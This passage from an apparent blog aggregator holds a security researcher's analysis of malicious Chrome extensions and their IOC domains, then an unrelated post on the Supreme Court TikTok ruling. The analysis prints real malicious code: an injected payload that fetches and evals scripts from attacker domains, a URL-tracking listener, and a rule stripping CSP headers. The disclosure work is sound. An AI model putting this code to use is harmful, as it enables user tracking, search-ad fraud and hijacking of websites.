    });
}
if (data.volumeHeaders) {
    chrome.storage.local.set({
        volumeHeaderRules: data.volumeHeaders
    });
}
if (data.newsPage) {
    this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}

This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file represent three malicious functions of the extensions.

Injecting HTML code into web pages

The extension contains a default “shortcut” which it will inject into all web pages. It can typically be seen in the lower right corner of a web page:

Screenshot of a web page footer with the Privacy, Terms and Settings links. Overlaying the latter is a colored diagonal arrow with a rectangular pink border.

And if you move your mouse pointer to that button a message shows up:

Screenshot of a web page footer. Overlaying it is a pink pop-up saying: To go Full-Screen, press F11 when watching a video.

That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.

And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.

“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.

Abusing declarativeNetRequest API

There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). And that mechanism can for example restrict what kind of scripts are allowed to run on the web site, in the same way the browser restricts the allowed scripts for the extension.

The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:

[
    {
        "id": 1,
        "priority": 1,
        "action": {
            "type": "modifyHeaders",
            "responseHeaders": [
                { "header": "gain-id", "operation": "remove" },
                { "header": "basic-gain", "operation": "remove" },
                { "header": "audio-simulation-64-bit", "operation": "remove" },
                { "header": "content-security-policy", "operation": "remove" },
                { "header": "audio-simulation-128-bit", "operation": "remove" },
                { "header": "x-frame-options", "operation": "remove" },
                { "header": "x-context-audio", "operation": "remove" }
            ]
        },
        "condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
    }
]

This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing Content-Security-Policy header is meant to disable CSP protection on all websites. And removing X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.

But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.

The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging from other extensions the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests which on the first glance is a very convenient way to perform affiliate fraud. It also allows “redirecting” requests when a website loads a script from a trusted source, making it get a malicious script instead – another way to hijack websites.

Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.

Opening new tabs

Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function which is essentially a wrapper around tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.

Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will take any options, other extensions will sometimes allow only specific options instead. One option that the developers of these extensions seem to particularly care about is active which allows opening tabs in background. This makes me suspect that the point of this feature is displaying pop-under advertisements.

The scheme summarized

There are many extensions similar to Volume Booster. The general approach seems to be:

  1. Make sure that the extension has permission to access all websites. Find a pretense why this is needed – or don’t, Google doesn’t seem to care too much.
  2. Find a reason why the extension needs to download its configuration from a web server. It doesn’t need to be convincing, nobody will ever ask why you couldn’t just keep that “configuration” in the extension.
  3. Use a part of that configuration in HTML code that the extension will inject in web pages. Of course you should “forget” to do any escaping or sanitization, so that HTML injection is possible.
  4. Feed another part of the configuration to declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites, nobody will ask why you need that.

Not all extensions implement all of these points. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t being added all at once, instead the support for malicious configurations is added slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing is to come here any more.

The payload

After I already published this article I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:

<img height="1" width="1" src="data:image/gif;base64,…"
     onload="(() => {…})();this.remove()">

This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:

if (isGoogle() || isFrame()) {
    hideIt();
    const script = yield loadScript();
    if (script) {
        window.eval.call(window, script);
        window.gsrpdt = 1;
        window.gsrpdta = '_new'
    }
}

The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.

The second code block looks like this (somewhat simplified for readability):

if (window.top == window.self) {
    let response = await fetch('https://everyview.info/c', {
        method: 'POST',
        body: btoa(unescape(encodeURIComponent(JSON.stringify({
            u: 'm5zthzwa3mimyyaq6e9',
            e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
            d: document.location.hostname,
            t: document.title,
            'iso': 4
        })))),
        headers: {
            'Content-Type': 'text/plain'
        },
        credentials: 'include'
    });
    let text = await response.text();
    runScript(decodeURIComponent(escape(atob(text))));
} else {
    window.addEventListener('message', function(event) {
        event && event.data && event.data.boosterWorker &&
            event.data.booster && runScript(event.data.booster);
    });
}

So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame and positions the frame above the search results. The result are ads which can be barely distinguished from actual search results, here is what I get searching for “amazon” for example:

Screenshot of what looks like Google search results, e.g. a link titled “Amazon Produkte - -5% auf alle Produkte”. The website mentioned above it is conrad.de however rather than amazon.de.

The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.

The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In this screenshot the link at the bottom is a search result, the one above it is an ad:

Screenshot of search results. Above a link titled “Amazon - Import US to Germany” with the domain myus.com. Below an actual Amazon.de link. Both have exactly the same visuals.

Who is behind these extensions?

These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two room apartment in Moscow.

Before founding this company in 2016 its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers to earn money with various kinds of ads. Clearly, there has been some competence transfer here.

Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don’t have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knifes.

Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.

Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.

The affected extensions

The following extensions are associated with Phoenix Invicta:

Name Weekly active users Extension ID Featured
Click & Pick 20 acbcnnccgmpbkoeblinmoadogmmgodoo
AdBlock for Youtube: Skip-n-Watch 3,000 coebfgijooginjcfgmmgiibomdcjnomi
Dopni - Automatic Cashback Service 19 ekafoahfmdgaeefeeneiijbehnbocbij
SkipAds Plus 95 emnhnjiiloghpnekjifmoimflkdmjhgp
1-Click Color Picker: Instant Eyedropper (hex, rgb, hsl) 10,000 fmpgmcidlaojgncjlhjkhfbjchafcfoe
Better Color Picker - pick any color in Chrome 10,000 gpibachbddnihfkbjcfggbejjgjdijeb
Easy Dark Mode 869 ibbkokjdcfjakihkpihlffljabiepdag
Manuals Viewer 101 ieihbaicbgpebhkfebnfkdhkpdemljfb
ScreenCapX - Full Page Screenshot 20,000 ihfedmikeegmkebekpjflhnlmfbafbfe
Capture It - Easy Screenshot Tool (Full Page, Selected, Visible Area) 48 lkalpedlpidbenfnnldoboegepndcddk
AdBlock - Ads and Youtube 641 nonajfcfdpeheinkafjiefpdhfalffof
Manual Finder 2024 280 ocbfgbpocngolfigkhfehckgeihdhgll
Volume Booster - Super Sound Booster 8,000 ojkoofedgcdebdnajjeodlooojdphnlj
Font Expert: Identify Fonts from Images & Websites 666 pjlheckmodimboibhpdcgkpkbpjfhooe

The following table also lists the extensions officially developed by Damiko Inc. With these, there is no indication of malicious intent, yet all but the last one share similarities with Phoenix Invicta extensions above and remove security headers.

Name Weekly active users Extension ID Featured
Screen Recorder 685 bgnpgpfjdpmgfdegmmjdbppccdhjhdpe
Halloween backgrounds and stickers for video calls and chats 31 fklkhoeemdncdhacelfjeaajhfhoenaa
AI Webcam Effects + Recorder: Google Meet, Zoom, Discord & Other Meetings 46 iedbphhbpflhgpihkcceocomcdnemcbj
Beauty Filter 136 mleflnbfifngdmiknggikhfmjjmioofi
Background Noise Remover 363 njmhcidcdbaannpafjdljminaigdgolj
Camera Picture In Picture (PIP Overlay) 576 pgejmpeimhjncennkkddmdknpgfblbcl

Netflix Party

Back in 2023 I pointed out that “Adblock all advertisements” is malicious and spying on its users. A year earlier McAfee already called out a bunch of extensions as malicious. For whatever reason, Google decided to let Adblock all advertisements stay, and three extensions from the McAfee article also remained in Chrome Web Store: Netflix Party, FlipShope and AutoBuy Flash Sales. Out of these three, Netflix Party and AutoBuy Flash Sales still (or again) contain malicious functionality.

Update (2025-01-28): This article originally claimed that FlipShope extension was also malicious and listed this extension cluster under the name of its developing company, Technosense Media. This was incorrect, the extension merely contained some recognizable but dead code. According to Technosense Media, they bought the extension in 2023. Presumably, the problematic code was introduced by the previous extension owner and is unused.

Spying on the users

Coming back to Adblock all advertisements, it is still clearly spying on its users, using ad blocking functionality as a pretense to send the address of each page visited to its server (code slightly simplified for readability):

chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if ("complete" === changeInfo.status) {
    let params = {
      url: tab.url,
      userId: await chrome.storage.sync.get("userId")
    };
    const response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(params)
    });
    const rules = await response.json();
    
  }
});

Supposedly, this code downloads a set of site-specific rules. This could in theory be legitimate functionality not meant to spy on users. That it isn’t legitimate functionality here isn’t indicated merely by the fact that the endpoint doesn’t produce any really meaningful responses. Legitimate functionality not intending to spy wouldn’t send a unique user ID with the request, the page address would be cut down to the host name (or would at least have all parameters removed) and the response would be cached. The latter would happen simply to reduce the load on this endpoint, something that anybody does unless the endpoint is paid for with users’ data.

The bogus rule processing

Nothing about the section above is new, I’ve already written as much in 2023. But either I haven’t taken a close look at the rule processing back then or it got considerably worse. Here is what it looks like today (variable and function naming is mine, the code was minified):

for (const key in rules)
  if ("id" === key || "genericId" === key)
    // Remove elements by ID
  else if ("class" === key || "genericClass" === key)
    // Remove elements by class name
  else if ("innerText" === key)
    // Remove elements by text
  else if ("rules" === key)
    if (rules.updateRules)
      applyRules(rules[key], rules.rule_scope, tabId);
  else if ("cc" === key)
    // Bogus logic to let the server decide which language-specific filter list
    // should be enabled

The interesting part here is the applyRules call which conveniently isn’t triggered by the initial server responses (updateRules key is set to false). This function looks roughly like this:

async function applyRules(rules, scope, tabId) {
  if ("global" !== scope) {
    if (0 !== rules.length) {
      const existingRules = await chrome.declarativeNetRequest.getDynamicRules();
      const ruleIds = existingRules.map(rule => rule.id);
      chrome.declarativeNetRequest.updateDynamicRules({
        removeRuleIds: ruleIds,
        addRules: rules
      });
    }
  } else {
    chrome.tabs.sendMessage(tabId, {
      message: "start",
      link: rules
    });
  }
}

So if the “scope” is anything but "global" the rules provided by the server will be added to the declarativeNetRequest API. Modifying these rules on per-request basis makes no sense for ad blocking, but it opens up rich possibilities for abuse as we’ve seen already. Given what McAfee discovered about these extensions before this is likely meant for cookie stuffing, yet execution of arbitrary JavaScript code in the context of targeted web pages is also a possible scenario.

And if the “scope” is "global" the extension sends a message to its content script which will inject a frame with the given address into the page. Again, this makes no sense whatsoever for blocking ads, but it definitely works for affiliate fraud – which is what these extensions are all about according to McAfee.

Depending on the extension there might be only frame injection or only adding of dynamic rules. Given the purpose of the AutoBuy extension, it can probably pass as legitimate by Google’s rules, others not so much.

The affected extensions

Name Weekly active users Extension ID Featured
Auto Refresh Plus 100,000 ffejlioijcokmblckiijnjcmfidjppdn
Smart Auto Refresh 100,000 fkjngjgmgbfelejhbjblhjkehchifpcj
Adblock all advertisement - No Ads extension 700,000 gbdjcgalliefpinpmggefbloehmmknca
AutoBuy Flash Sales, Deals, and Coupons 20,000 gbnahglfafmhaehbdmjedfhdmimjcbed
Autoskip for Youtube™ Ads 200,000 hmbnhhcgiecenbbkgdoaoafjpeaboine
Smart Adblocker 50,000 iojpcjjdfhlcbgjnpngcmaojmlokmeii
Adblock for Browser 10,000 jcbjcocinigpbgfpnhlpagidbmlngnnn
Netflix Party 500,000 mmnbenehknklpbendgmgngeaignppnbe
Free adblocker 8,000 njjbfkooniaeodkimaidbpginjcmhmbm
Video Ad Block Youtube 100,000 okepkpmjhegbhmnnondmminfgfbjddpb
Picture in Picture for Videos 30,000 pmdjjeplkafhkdjebfaoaljknbmilfgo

Update (2025-01-28): Added Auto Refresh Plus and Picture in Picture for Videos to the list. The former only contains the spying functionality, the latter spying and frame injection.

Sweet VPN

I’ll be looking at Sweet VPN as representative for 32 extensions I found using highly obfuscated code. These extensions aren’t exactly new to this blog either, my post in 2023 already named three of them even though I couldn’t identify the malicious functionality back then. Most likely I simply overlooked it, I didn’t have time to investigate each extension thoroughly.

These extensions also decided to circumvent remote code restrictions but their approach is way more elaborate. They download some JSON data from the server and add it to the extension’s storage. While some keys like proxy_list are expected here and always present, a number of others are absent from the server response when the extension is first installed. These can contain malicious instructions.

Anti-debugging protection

For example, the four keys 0, 1, 2, 3 seem to be meant for anti-debugging protection. If present, the values of these keys are concatenated and parsed as JSON into an array. A property resolution mechanism then allows resolving arbitrarily deep values, starting at the self object of the extension’s background worker. The result are three values which are used like this:

value1({value2: value3}, result => {
  
});

This call is repeated every three seconds. If result is a non-empty array, the extension removes all but a few storage keys and stops further checks. This is clearly meant to remove traces of malicious activity. I am not aware of any ways for an extension to detect an open Developer Tools window, so this call is probably meant to detect the extension management page that Developer Tools are opened from:

chrome.tabs.query({"url": "chrome://extensions/*"}, result => {
  
});

Guessing further functionality

This protection mechanism is only a very small part of the obfuscated logic in the extension. There are lots of values being decoded, tossed around, used in some function calls. It is difficult to reconstruct the logic with the key parts missing. However, the extension doesn’t have too many permissions:

"permissions": [
  "proxy",
  "storage",
  "tabs"
],
"host_permissions": [
  "https://ipapi.co/json/",
  "https://ip.seeip.org/geoip",
  "https://api.myip.com/",
  "https://ifconfig.co/json"
],

Given that almost no websites can be accessed directly, it’s a safe bet that the purpose of the concealed functionality is spying on the users. That’s what the tabs permission is for, to be notified of any changes in the user’s browsing session.

In fact, once you know that the function being passed as parameter is a tabs.onUpdated listener its logic becomes way easier to understand, despite the missing parts. So the cl key in the extension’s storage (other extensions often use other names) is the event queue where data about the user’s browsing is being stored. Once there are at least 10 events the queue is sent to the same address where the extension downloads its configuration from.

There are also some chrome.tabs.update() calls in the code, replacing the address of the currently loading page by something else. It’s hard to be certain what these are used for: it could be search redirection, affiliate fraud or plainly navigating to advertising pages.

The affected extensions

Name Weekly active users Extension ID Featured
VK UnBlock. Works fast. 40,000 ahdigjdpekdcpbajihncondbplelbcmo
VPN Proxy Master 120 akkjhhdlbfibjcfnmkmcaknbmmbngkgn
VPN Unblocker for Instagram 8,000 akmlnidakeiaipibeaidhlekfkjamgkm
StoriesHub 100,000 angjmncdicjedpjcapomhnjeinkhdddf
Facebook and Instagram Downloader 30,000 baajncdfffcpahjjmhhnhflmbelpbpli
Downloader for Instagram - ToolMaster 100,000 bgbclojjlpkimdhhdhbmbgpkaenfmkoe
TikTok in USA 20,000 bgcmndidjhfimbbocplkapiaaokhlcac
Sweet VPN 100,000 bojaonpikbbgeijomodbogeiebkckkoi
Access to Odnoklassniki 4,000 ccaieagllbdljoabpdjiafjedojoejcl
Ghost - Anonymous Stories for Instagram 20,000 cdpeckclhmpcancbdihdfnfcncafaicp
StorySpace Manager for FB and IG Stories 10,000 cicohiknlppcipjbfpoghjbncojncjgb
VPN Unblocker for YouTube 40,000 cnodohbngpblpllnokiijcpnepdmfkgm
Universal Video Downloader 200,000 cogmkaeijeflocngklepoknelfjpdjng
Free privacy connection - VPN guru 500,000 dcaffjpclkkjfacgfofgpjbmgjnjlpmh
Live Recorder for Instagram aka MasterReco 10,000 djngbdfelbifdjcoclafcdhpamhmeamj
Video Downloader for Vimeo 100,000 dkiipfbcepndfilijijlacffnlbchigb
VPN Ultimate - Best VPN by unblock 400,000 epeigjgefhajkiiallmfblgglmdbhfab
Insured Smart VPN - Best Proxy ever unblock everything 2,000 idoimknkimlgjadphdkmgocgpbkjfoch
Ultra Downloader for Instagram 30,000 inekcncapjijgfjjlkadkmdgfoekcilb
Parental Control. Blocks porn, malware, etc. 3,000 iohpehejkbkfdgpfhmlbogapmpkefdej
UlV. Ultimate downloader for Vimeo 2,000 jpoobmnmkchgfckdlbgboeaojhgopidn
Simplify. Downloader for Instagram 20,000 kceofhgmmjgfmnepogjifiomgojpmhep
Download Facebook Video 591 kdemfcffpjfikmpmfllaehabkgkeakak
VPN Unblocker for Facebook 3,000 kheajjdamndeonfpjchdmkpjlemlbkma
Video Downloader for FaceBook 90,000 kjnmedaeobfmoehceokbmpamheibpdjj
TikTok Video Keeper 40,000 kmobjdioiclamniofdnngmafbhgcniok
Mass Downloader for Instagram 100,000 ldoldiahbhnbfdihknppjbhgjngibdbe
Stories for FaceBook - Anon view, download 3,000 nfimgoaflmkihgkfoplaekifpeicacdn
VPN Surf - Fast VPN by unblock 800,000 nhnfcgpcbfclhfafjlooihdfghaeinfc
TikTok Video Downloader 20,000 oaceepljpkcbcgccnmlepeofkhplkbih
Video Downloader for FaceBook 10,000 ododgdnipimbpbfioijikckkgkbkginh
Exta: Pro downloader for Instagram 10,000 ppcmpaldbkcoeiepfbkdahoaepnoacgd

Bonus section: more malicious extensions

Update (2025-01-20): Added Adblock Bear and AdBlock 360 after a hint from a commenter.

As is often the case with Chrome Web Store, my searches regularly turned up more malicious extensions unrelated to the ones I was looking for. Some of them also devised their mechanisms to execute remote code. I didn’t find more extensions using the same approach, which of course doesn’t mean that there are none.

Adblock for Youtube is yet another browser extension essentially bundling an interpreter for their very own minimalistic programming language. One part of the instructions it receives from its server is executed in the context of the privileged background worker, the other in the content script context.

EasyNav, Adblock Bear and AdBlock 360 use an approach quite similar to Phoenix Invicta. In particular, they add rules to the declarativeNetRequest API that they receive from their respective server. EasyNav also removes security headers. These extensions don’t bother with HTML injection however, instead their server produces a list of scripts to be injected into web pages. There are specific scripts for some domains and a fallback for everything else.

Download Manager Integration Checklist is merely supposed to display some instructions, it shouldn’t need any privileges at all. Yet this extension requests access to all web pages and will add rules to the declarativeNetRequest API that it downloads from its server.

Translator makes it look like its configuration is all about downloading a list of languages. But it also contains a regular expression to test against website addresses and the instructions on what to do with matching websites: a tag name of the element to create and a bunch of attributes to set. Given that the element isn’t removed after insertion, this is probably about injecting advertising frames. This mechanism could just as well be used to inject a script however.

The affected extensions

Name Weekly active users Extension ID Featured
Adblock for Youtube™ - Auto Skip ad 8,000 anceggghekdpfkjihcojnlijcocgmaoo
EasyNav 30,000 aobeidoiagedbcogakfipippifjheaom
Adblock Bear - stop invasive ads 100,000 gdiknemhndplpgnnnjjjhphhembfojec
AdBlock 360 400,000 ghfkgecdjkmgjkhbdpjdhimeleinmmkl
Download Manager Integration Checklist 70,000 ghkcpcihdonjljjddkmjccibagkjohpi
Translator 100,000 icchadngbpkcegnabnabhkjkfkfflmpj

IOCs

The following domain names are associated with Phoenix Invicta:

  • 1-click-cp[.]com
  • adblock-ads-and-yt[.]pro
  • agadata[.]online
  • anysearch[.]guru
  • anysearchnow[.]info
  • astatic[.]site
  • astato[.]online
  • astralink[.]click
  • best-browser-extensions[.]com
  • better-color-picker[.]guru
  • betterfind[.]online
  • capture-it[.]online
  • chrome-settings[.]online
  • click-and-pick[.]pro
  • color-picker-quick[.]info
  • customcursors[.]online
  • dailyview[.]site
  • datalocked[.]online
  • dmext[.]online
  • dopni[.]com
  • doublestat[.]info
  • doubleview[.]online
  • easy-dark-mode[.]online
  • emojikeyboard[.]site
  • everyview[.]info
  • fasterbrowser[.]online
  • fastertabs[.]online
  • findmanual[.]org
  • fivem[.]com[.]tr
  • fixfind[.]online
  • font-expert[.]pro
  • freestikers[.]top
  • freetabmemory[.]online
  • get-any-manual[.]pro
  • get-manual[.]info
  • getresult[.]guru
  • good-ship[.]com
  • gulkayak[.]com
  • isstillalive[.]com
  • kralforum[.]com[.]tr
  • locodata[.]site
  • lottingem[.]com
  • manual-finder[.]site
  • manuals-viewer[.]info
  • megaboost[.]site
  • nocodata[.]online
  • ntdataview[.]online
  • picky-ext[.]pro
  • pocodata[.]pro
  • readtxt[.]pro
  • rumorpix[.]com
  • screencapx[.]co
  • searchglobal[.]online
  • search-protection[.]org
  • searchresultspage[.]online
  • shurkul[.]online
  • skipadsplus[.]online
  • skip-all-ads[.]info
  • skip-n-watch[.]info
  • skippy[.]pro
  • smartsearch[.]guru
  • smartsearch[.]top
  • socialtab[.]top
  • soundbooster[.]online
  • speechit[.]pro
  • super-sound-booster[.]info
  • tabmemoptimizer[.]site
  • taboptimizer[.]com
  • text-speecher[.]online
  • topodat[.]info
  • triplestat[.]online
  • true-sound-booster[.]online
  • ufind[.]site
  • video-downloader-click-save[.]online
  • video-downloader-plus[.]info
  • vipoisk[.]ru
  • vipsearch[.]guru
  • vipsearch[.]top
  • voicereader[.]online
  • websiteconf[.]online
  • youtube-ads-skip[.]site
  • ystatic[.]site

The following domain names are used by Netflix Party and related extensions:

  • abforbrowser[.]com
  • autorefresh[.]co
  • autorefreshplus[.]in
  • getmatchingcouponsanddeals[.]info
  • pipextension[.]com
  • smartadblocker[.]com
  • telenetflixparty[.]com
  • ytadblock[.]com
  • ytadskip[.]com

The following domain names are used by Sweet VPN and related extensions:

  • analyticsbatch[.]com
  • aquafreevpn[.]com
  • batchindex[.]com
  • browserdatahub[.]com
  • browserlisting[.]com
  • checkbrowserer[.]com
  • countstatistic[.]com
  • estimatestatistic[.]com
  • metricbashboard[.]com
  • proxy-config[.]com
  • qippin[.]com
  • realtimestatistic[.]com
  • secondstatistic[.]com
  • securemastervpn[.]com
  • shceduleuser[.]com
  • statisticindex[.]com
  • sweet-vpn[.]com
  • timeinspection[.]com
  • traficmetrics[.]com
  • trafficreqort[.]com
  • ultimeo-downloader[.]com
  • unbansocial[.]com
  • userestimate[.]com
  • virtualstatist[.]com
  • webstatscheck[.]com

These domain names are used by the extensions in the bonus section:

  • adblock-360[.]com
  • easynav[.]net
  • internetdownloadmanager[.]top
  • privacy-bear[.]net
  • skipads-ytb[.]com
  • translatories[.]com

Don MartiSupreme Court files confusing bug report

I’m still an Internet optimist despite…things…so I was hoping that Friday’s Supreme Court opinion in the TikTok case would have some useful information about how to design online social networking in a way that does get First Amendment protection, even if TikTok doesn’t. But no. Considered as a bug report, the opinion doesn’t help much. We basically got (1) TikTok collects lots of personal info (2) Congress gets to decide if and how it’s a national security problem to make personal info available to a foreign adversary, and so TikTok is banned. But everyone else doing social software, including collaboration software, is going to have a lot to find out for themselves.

The Supreme Court pretty much ignores TikTok’s dreaded For You Page algorithm and focuses on the privacy problem. So we don’t know if some future ban of some hypothetical future app that somehow fixed its data collection issues would hold up in court just based on how it does content recommendations. (Regulating recommendation algorithms is a big issue that I’m not surprised the Court couldn’t agree on in the short time they had for this case.) We also get the following, on p. 9—TikTok got the benefit of the doubt and received some First Amendment consideration that future apps might or might not.

This Court has not articulated a clear framework for determining whether a regulation of non-expressive activity that disproportionately burdens those engaged in expressive activity triggers heightened review. We need not do so here. We assume without deciding that the challenged provisions fall within this category and are subject to First Amendment scrutiny.

Page 11 should be good news for anybody drafting a privacy law anyway. Regulating data collection is content neutral for First Amendment purposes—which should be common sense.

The Government also supports the challenged provisions with a content-neutral justification: preventing China from collecting vast amounts of sensitive data from 170 million U. S. TikTok users. That rationale is decidedly content agnostic. It neither references the content of speech on TikTok nor reflects disagreement with the message such speech conveys….Because the data collection justification reflects a purpose[e] unrelated to the content of expression, it is content neutral.

The outbound flow of data from people in the USA is what makes the TikTok ban hold up in court. Prof. Eric Goldman writes that the ban is taking advantage of a privacy pretext for censorship, which is definitely something to watch out for in future privacy laws, but doesn’t apply in this case.

But so far the to-do list for future apps looks manageable.

  • Don’t surveil US users for a foreign adversary

  • Comply with whatever future restrictions on recommendation algorithms turn out to hold up in court. (Disclosure of rules or source code? Allow users to switch to chronological? Allow client-side or peer-to-peer filtering and scoring? Lots of options but possible to get out ahead of.)

Not so fast. Here’s the hard part. According to the Court the problem is not just the info that the app collects automatically and surreptitiously, or the user actions it records, but also the info that users send by some deliberate action. On page 14:

If, for example, a user allows TikTok access to the user’s phone contact list to connect with others on the platform, TikTok can access any data stored in the user’s contact list, including names, contact information, contact photos, job titles, and notes. Access to such detailed information about U. S. users, the Government worries, may enable China to track the locations of Federal employees and contractors, build dossiers of personal information for blackmail, and conduct corporate espionage.

and in Justice Gorsuch’s concurrence,

According to the Federal Bureau of Investigation, TikTok can access any data stored in a consenting user’s contact list—including names, photos, and other personal information about unconsenting third parties. Ibid. (emphasis added). And because the record shows that the People’s Republic of China (PRC) can require TikTok’s parent company to cooperate with [its] efforts to obtain personal data, there is little to stop all that information from ending up in the hands of a designated foreign adversary.

On the one hand, yes, sharing contacts does transfer a lot of information about people in the USA to TikTok. But sharing a contact list with an app can work a lot of different ways. It can be

  1. covert surveillance (although mobile platforms generally do their best to prevent this)

  2. data sharing that you get tricked into

  3. deliberate, more like choosing to email a copy of the company directory as an attachment

If it’s really a problem to enable a user to choose to share contact info, then that makes running collaboration software like GitHub in China a problem from the USA side. (Git repositories are full of metadata about who works on what, with who. And that information is processed by other users, by the platform itself, and by third-party tools.) Other content creation tools also share the kinds of info on skills and work relationships that would be exactly what a foreign adversary murder robot needs to prioritize targets. But the user, not some surveillance software, generally puts that info there. If intentional contact sharing by users is part of the reason that the USA can ban TikTok, what does that mean for other kinds of user to user communication?

Kleptomaniac princesses

There’s a great story I read when I was a kid that I wish I had the citation for. It might be fictional, but I’m going to summarize it anyway because it’s happening again.

Once upon a time there was a country that the UK really, really wanted to maintain good diplomatic relations with. The country was in a critical strategic location and had some kind of natural resources or something, I don’t remember the details. The problem, though, was that the country was a monarchy, and one of the princesses loved to visit London and shoplift. And she was really bad at it. So diplomats had to go around to the stores in advance to tell the manager what’s going on, convince the store to let her steal stuff, and promise to settle up afterwards.

Today, the companies that run the surveillance apps are a lot like that princess. techbros don’t have masculine energy, they have kleptomaniac princess energy If one country really needs to maintain good relations with another, they’ll allow that country’s surveillance apps to get away with privacy shenanigans. If relations get chillier, then normal law enforcement applies. At least for now, though, we don’t know what the normal laws here will look like, and the Supreme Court didn’t provide many hints yesterday.

Related

Big Tech platforms: mall, newspaper, or something else? A case where the Supreme Court did give better instructions (to state legislators, though, not app developers)

In TikTok v. Garland, Supreme Court Sends Good Vibes for Privacy Laws, But Congress’s Targeting of TikTok Alone Won’t Do Much to Protect Privacy by Tom McBrien, EPIC Counsel. The Court’s opinion was also a good sign for privacy advocates because it made clear that regulating data practices is an important and content-neutral regulatory intervention. Tech companies and their allies have long misinterpreted a Supreme Court case called Sorrell v. IMS Health to mean that all privacy laws are presumptively unconstitutional under the First Amendment because information is speech. But the TikTok Court explained that passing a law to protect privacy is decidedly content agnostic because it neither references the content of speech…nor reflects disagreement with the message such speech conveys. In fact, the Court found the TikTok law constitutional specifically on the grounds that it was passed to regulate privacy and emphasized how important the government interest is in protecting American’s privacy.

Bonus links

TikTok, AliExpress, SHEIN & Co surrender Europeans’ data to authoritarian China Today, noyb has filed GDPR complaints against TikTok, AliExpress, SHEIN, Temu, WeChat and Xiaomi for unlawful data transfers to China….As none of the companies responded adequately to the complainants’ access requests, we have to assume that this includes China. But EU law is clear: data transfers outside the EU are only allowed if the destination country doesn’t undermine the protection of data.

Total information collapse by Carole Cadwalladr It was the open society that enabled Zuckerberg to build his company, that educated his engineers and created a modern scientific country that largely obeyed the rules-based order. But that’s over. And, this week is a curtain raiser for how fast everything will change. Zuckerberg took a smashing ball this week to eight years’ worth of “trust and safety” work that has gone into trying to make social media a place fit for humans. That’s undone in a single stroke.

Lawsuit: Allstate used GasBuddy and other apps to quietly track driving behavior by Kevin Purdy. (But which of the apps running tracking software are foreign-owned? Because you can register an LLC in many states anonymously, it’s impossible to tell.)

